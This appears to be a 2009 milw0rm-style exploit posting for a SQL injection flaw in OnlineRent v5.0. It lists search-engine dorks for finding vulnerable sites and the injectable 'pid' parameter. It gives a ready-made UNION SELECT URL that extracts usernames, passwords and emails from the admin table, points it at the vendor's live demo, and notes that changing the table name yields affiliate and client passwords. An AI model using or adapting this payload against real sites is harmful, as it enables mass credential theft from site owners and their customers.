OnlineRent v5.0 Remote SQL injection
/
---------------------------------------------------------------/
[*] Author: UnderTaker HaCkEr
[*] Dork:©My ltd 2008. ALL RIGHTS RESERVED
[*] Dork2: allintitle: V45 TEMPLATE
[*] Vender: http://online-rent.com
[*] Exploit: http: // [TARGET]/[Path]/index. php? Custom_language = turkish & user = detaliespopupcondrent & pid = {SQL}
[*] Example: http: // [TARGET]/[Path]/index. php? Custom_language = turkish & user = detaliespopupcondrent & pid = 1 AND 1 = 0% 75% 6E % 69% 6F % 6E SELECT 1, concat_ws (0x3e, user, password, email), 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17 FROM admin --
[*] Live Demo: http://www.online-rent.com/demo/index.php? Custom_language = turkish & user = detaliespopupcondrent & pid = 1 AND 1 = 0% 75% 6E % 69% 6F % 6E SELECT 1, concat_ws (0x3e, user, password, email), 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17 FROM admin --
[*] Note: You can grab the affiliates and clients passwords by just changing FROM admin to FROM affiliates or FROM clients
[*] Email: B-2@hotmail.com
[*] Friends: s4s Hacker, Cold-z3ro, KANE HaCkEr, wzir al-Hacker, ReD-D3v1l, Brkod hacker, Net Boy, TiGer Net, NaiF HaCkEr, Dr, Mt3bny, Crazy Net
[*] Friends2: MosTsHaR HaCkEr, his0k4, Index HaCkEr, MiDNiGhT HaCkEr, Mr. JL6h, Dmar Network, Never HaCkEr, Dragon HaCkEr, Jhon Cena, MaDReDi 511
Certificate -----------------------------------------------------------------------------------------------------------------------------------------------------------
# Milw0rm.com [2009-05-18]